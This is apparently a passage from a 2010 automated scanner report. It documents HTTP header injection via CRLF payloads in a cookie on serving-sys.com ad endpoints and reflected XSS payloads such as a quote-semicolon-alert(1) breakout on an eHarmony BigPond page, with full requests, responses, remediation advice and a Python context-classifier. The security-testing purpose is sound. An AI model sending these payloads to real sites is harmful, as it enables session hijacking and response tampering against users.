B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 23 Nov 2010 03:27:18 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWfBAg9QdG03ai0000o61wrWez3M9MXe05qO9MXhe3wUrNfpvx9Qbf0bKd0000820wrWeT709LaB0a4c9KVBK42UrIeQyI9KVU0bnA0000820wrHei.Q9EyK07ft0000o61wrpeZOX9Qdt03ai0000820wrWfpuV9Qas0bKd0000g410rWedj59B6M09Gc0000820wrfePZ99P6K07l00000g210rTfhPu9MHD0bnA0000820wrMdtFJ9MH60aVX0000820wrMe1YN9KVH08te0000820wrHff3e9P0S03sY0000820wrTeC519MH60aVX00008y8yrMeT809KVD0a4c9KVEm5xorHf2Ca9KVJ02Hn0000820wrHfGff9Qe30bPK9Qd9m5xorWdP239QaW0bfK0000820wrWewrC9P6K0bfD0000820wrTedd99KVI077T0000820wrHf5Kg9KTC07g60000820wrHeBgi9QdI04PT0000820wrW; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7grL0820wrH6OeH0820wrW6SKe0820wrH6VCF0820wrf7hMi0m5xorH7FL40o61wrW7fP70820wrW76AK0e3wUrN785p0820wrW6V2p0820wrH7nwv0820wrH745g061worW7nig0820wrH5suX0g210rT7yh30g410rW70vL0o61wrp7FLX0m5xorW74..0820wrT7yh50820wrW6UUT0820wrT7luQ0820wrM7hMh0K42UrI6E4C0gA92rM6E4D0820wrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0t+c820wrT000000g_0vq9o61wrW0000001_0uv2820wrH0000001_0u3Je3wUrN0000020_0rUe820wrW0000001_0tIT820wrH0000080_0u6F820wrM0000040_0tye820wrW0000001_0uSU820wrW0000008_0tJNo61wrW0000001_0tUC820wrT0008000_0uf9820wrH0000w00_0vHUm5xorW0000001_0tUd820wrH0000001_0sTh820wrf0000001_0uXiS43orI0000002_0t8ko61wrp0000w00_0uRt820wrH00000g0_0upO61worW0000000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0upO009p61worW0sJz02lBoC9yrM0t8k00iZo61wrp0vq905Zwo61wrW0uSU00m+820wrW0tJN00m+o61wrW0tye01xc820wrW0u3J01B9e3wUrN0tIT00cN820wrH0tUC0053820wrT0uXi00Y3S43orI0t+c00iZ820wrT0tUd001N820wrH0u6F004H820wrM0ppC00iZg210rT0rUe00m+820wrW0vHU00m+m5xorW0uv201xc820wrH0sTh00ai820wrf0uf900EM820wrH0uRt03HD820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aVXoC9yrM07l0g210rT077T820wrH08te820wrH03aiw820rW03sY820wrT0a4cS43orI07fto61wrp02Hn820wrH0bfK820wrW03Gz61worW05qOe3wUrN09Gc820wrf0bKdo61wrW0bfDe3wUrT0bPKm5xorW0bnAg410rM04PT820wrW07g6820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_504f0
52c6ed00ba4
=4105167
Location: http://ds.serving-sys.com/BurstingRes/Site-1470/Type-0/3a3fa324-aacf-45d7-8247-47c3e005dc22.jpg
Content-Length: 0


1.6. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b58b%0d%0a1915b172d08 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=03b58b%0d%0a1915b172d08; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=03b58b
1915b172d08
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close


1.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 7216b%0d%0a306de5af752 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=07216b%0d%0a306de5af752; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=07216b
306de5af752
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


1.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fcafc%0d%0abef809e8cc2 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2006011&PluID=0&w=300&h=250&ord=773648220124&ifrm=1&ucm=true&ncu=$$http://media.sensis.com.au/ADCLICK/CID=000345301f45920200000000/acc_random=773648220124/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=300x250/POSITION=ABV1/pageid=365717345415/relocate=$$&z=0\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=00UilH0003sY9PGI; U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNfBAg9QdG03ai0000o61wrWfpvx9Qbf0bKd0000820wrWeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qas0bKd0000g410rWeZOX9Qdt03ai0000820wrWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMfGff9Qd70bPK9Qd9e3wUrWeBgi9QdI04PT0000820wrWf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrTdP239QaW0bfK0000820wrW; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0fcafc%0d%0abef809e8cc2; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH6OeH0820wrW7hMi0m5xorH7FL40o61wrW785p0820wrW76AK0e3wUrN7fP70820wrW7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp7yh50820wrW74..0820wrT7FLX0e3wUrW7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; E2=0aVXoC9yrM07l0g210rT077T820wrH03aiw820rW08te820wrH0bfK820wrW02Hn820wrH07fto61wrp0a4cS43orI03sY820wrT05qOe3wUrN03Gz61worW09Gc820wrf0bfDe3wUrT0bKdo61wrW0bPKe3wUrW0bnAg410rM07g6820wrH04PT820wrW; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9o61wrW0000001_0t+c820wrT000000g_0rUe820wrW0000001_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tye820wrW0000001_0uSU820wrW0000008_0tUC820wrT0008000_0tJNo61wrW0000001_0uf9820wrH0000w00_0tUd820wrH0000001_0vHUe3wUrW0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; u3=1; ActivityInfo=000ltNb65%5f; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwo61wrW0t8k00iZo61wrp0uSU00m+820wrW0tye01xc820wrW0tJN00m+o61wrW0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0rUe00m+820wrW0ppC00iZg210rT0vHU00m+e3wUrW0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 2916
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0fcafc
bef809e8cc2
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWfBAg9QdG03ai0000o61wrWez3M9MXe05qO9MXhe3wUrNfpvx9Qbf0bKd0000820wrWeT709LaB0a4c9KVBK42UrIeQyI9KVU0bnA0000820wrHei.Q9EyK07ft0000o61wrpeZOX9Qdt03ai0000820wrWfpuV9Qas0bKd0000g410rWedj59B6M09Gc0000820wrfePZ99P6K07l00000g210rTfhPu9MHD0bnA0000820wrMdtFJ9MH60aVX0000820wrMe1YN9KVH08te0000820wrHff3e9P0S03sY0000820wrTeC519MH60aVX00008y8yrMeT809KVD0a4c9KVEm5xorHf2Ca9KVJ02Hn0000820wrHfGff9Qd70bPK9Qd9e3wUrWfEsU9Qe30bPK0000820wrWdP239QaW0bfK0000820wrWewrC9P6K0bfD0000820wrTedd99KVI077T0000820wrHf5Kg9KTC07g60000820wrHeBgi9QdI04PT0000820wrW; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7grL0820wrH6OeH0820wrW6SKe0820wrH6VCF0820wrf7hMi0m5xorH7FL40o61wrW7fP70820wrW76AK0e3wUrN785p0820wrW6V2p0820wrH7nwv0820wrH745g061worW7nig0820wrH5suX0g210rT7yh30g410rW70vL0o61wrp7FLX0m5xorW74..0820wrT7yh50820wrW6UUT0820wrT7luQ0820wrM7hMh0K42UrI6E4C0gA92rM6E4D0820wrM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0t+c820wrT000000g_0vq9o61wrW0000001_0uv2820wrH0000001_0u3Je3wUrN0000020_0rUe820wrW0000001_0tIT820wrH0000080_0u6F820wrM0000040_0tye820wrW0000001_0uSU820wrW0000008_0tJNo61wrW0000001_0tUC820wrT0008000_0uf9820wrH0000w00_0vHUm5xorW0000001_0tUd820wrH0000001_0sTh820wrf0000001_0uXiS43orI0000002_0t8ko61wrp0000w00_0uRt820wrH00000g0_0upO61worW0000000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0upO009p61worW0sJz02lBoC9yrM0t8k00iZo61wrp0vq905Zwo61wrW0uSU00m+820wrW0tJN00m+o61wrW0tye01xc820wrW0u3J01B9e3wUrN0tIT00cN820wrH0tUC0053820wrT0uXi00Y3S43orI0t+c00iZ820wrT0tUd001N820wrH0u6F004H820wrM0ppC00iZg210rT0rUe00m+820wrW0vHU00m+m5xorW0uv201xc820wrH0sTh00ai820wrf0uf900EM820wrH0uRt03HD820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aVXoC9yrM07l0g210rT077T820wrH08te820wrH03aiw820rW03sY820wrT0a4cS43orI07fto61wrp02Hn820wrH0bfK820wrW03Gz61worW05qOe3wUrN09Gc820wrf0bKdo61wrW0bfDe3wUrT0bPKm5xorW0bnAg410rM04PT820wrW07g6820wrH; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Connection: close

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2. Cross-site scripting (reflected)
There are 776 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain: the cid, aid and pid values reflected by bigpond.eharmony.com.au in the findings below are plain integers in the requests shown (55653, 1000) and should accept nothing else; a year of birth should be exactly four digits; an email address should match a well-defined pattern. Input which fails validation should be rejected, not sanitised. Second, user input should be encoded at the point where it is copied into the response, using the encoding that matches that output context: in HTML text and attribute values all HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities; inside a JavaScript string the value should be emitted as an escaped string literal with < and > also escaped so it can never close the script element, or better, not placed inside script at all.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://bigpond.eharmony.com.au/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpond.eharmony.com.au
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff716"%3balert(1)//ce6330e97f5 was submitted in the aid parameter. This input was echoed as ff716";alert(1)//ce6330e97f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the same aid value is written to the eh_aff_tracking cookie with the quote, semicolon, parentheses and slashes stripped (see the Set-Cookie header in the response below, aid=1000ff716alert1ce6330e97f5), so the application does sanitise this input for one sink but copies it unmodified into the inline analytics script. The cid and pid parameters (2.2 and 2.3) behave the same way.
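How a verdict such as "copied into a JavaScript string which is encapsulated in double quotation marks" is reached: each probe carries a unique random marker, and the response is searched for that marker so the syntax around the reflection point can be examined. The following is an added example in Python, not the scanner's own code, and the context heuristic is a simplification of what a real scanner does; the sample bodies are trimmed from the responses shown under 2.1, 2.4 and 2.7, and the PROBES markers are the random prefixes those payloads carried.

```python
import re

# Constructed samples: trimmed from the responses shown under 2.1, 2.4 and 2.7.
SAMPLES = {
    "2.1": '<script>\n s.prop7="1000ff716";alert(1)//ce6330e97f5";\n</script>',
    "2.4": ('<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/'
            '?cid=bph-music-headcc97d"style="x:expression(alert(1))"3d602eff078" />'),
    "2.7": "<script>\n s.channel = '100f1a30';d1138b1a62b';\n</script>",
}
# The random prefix each probe carried, used to locate the reflection.
PROBES = {"2.1": "ff716", "2.4": "cc97d", "2.7": "f1a30"}

SCRIPT_OPEN = re.compile(r"<script\b[^>]*>", re.I)
SCRIPT_CLOSE = re.compile(r"</script\s*>", re.I)


def script_start(body: str, pos: int):
    """Offset just after the <script> tag enclosing pos, or None if not in script."""
    opens = [m.end() for m in SCRIPT_OPEN.finditer(body) if m.end() <= pos]
    closes = [m.start() for m in SCRIPT_CLOSE.finditer(body) if m.start() <= pos]
    return opens[-1] if len(opens) > len(closes) else None


def js_open_string(script_text: str):
    """Walk the script text up to the reflection; return the quote character
    of a string literal that is still open there, or None."""
    quote = None
    i = 0
    while i < len(script_text):
        c = script_text[i]
        if quote:
            if c == "\\":
                i += 1               # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        i += 1
    return quote


def html_attr_quote(body: str, pos: int):
    """Quote character of the attribute value enclosing pos, or None."""
    lt, gt = body.rfind("<", 0, pos), body.rfind(">", 0, pos)
    if lt < 0 or gt > lt:
        return None                  # pos is in text content, not inside a tag
    m = re.search(r'=\s*(["\'])[^"\']*\Z', body[lt:pos])
    return m.group(1) if m else None


def classify(body: str, probe: str) -> str:
    """Name the syntactic context the probe marker was reflected into."""
    pos = body.find(probe)
    if pos < 0:
        return "not reflected"
    start = script_start(body, pos)
    if start is not None:
        q = js_open_string(body[start:pos])
        if q:
            return "JS string (%s-quoted)" % ("double" if q == '"' else "single")
        return "JS code"
    q = html_attr_quote(body, pos)
    if q:
        return "HTML attribute (%s-quoted)" % ("double" if q == '"' else "single")
    return "HTML text"


if __name__ == "__main__":
    for finding, body in SAMPLES.items():
        print(finding, classify(body, PROBES[finding]))
```

The context decides which characters the follow-up payload needs: a double-quoted JS string needs only `"` and `;` (2.1), a double-quoted attribute needs `"` plus either `>` or a second attribute (2.4), and a single-quoted JS string needs `'` (2.7).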

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
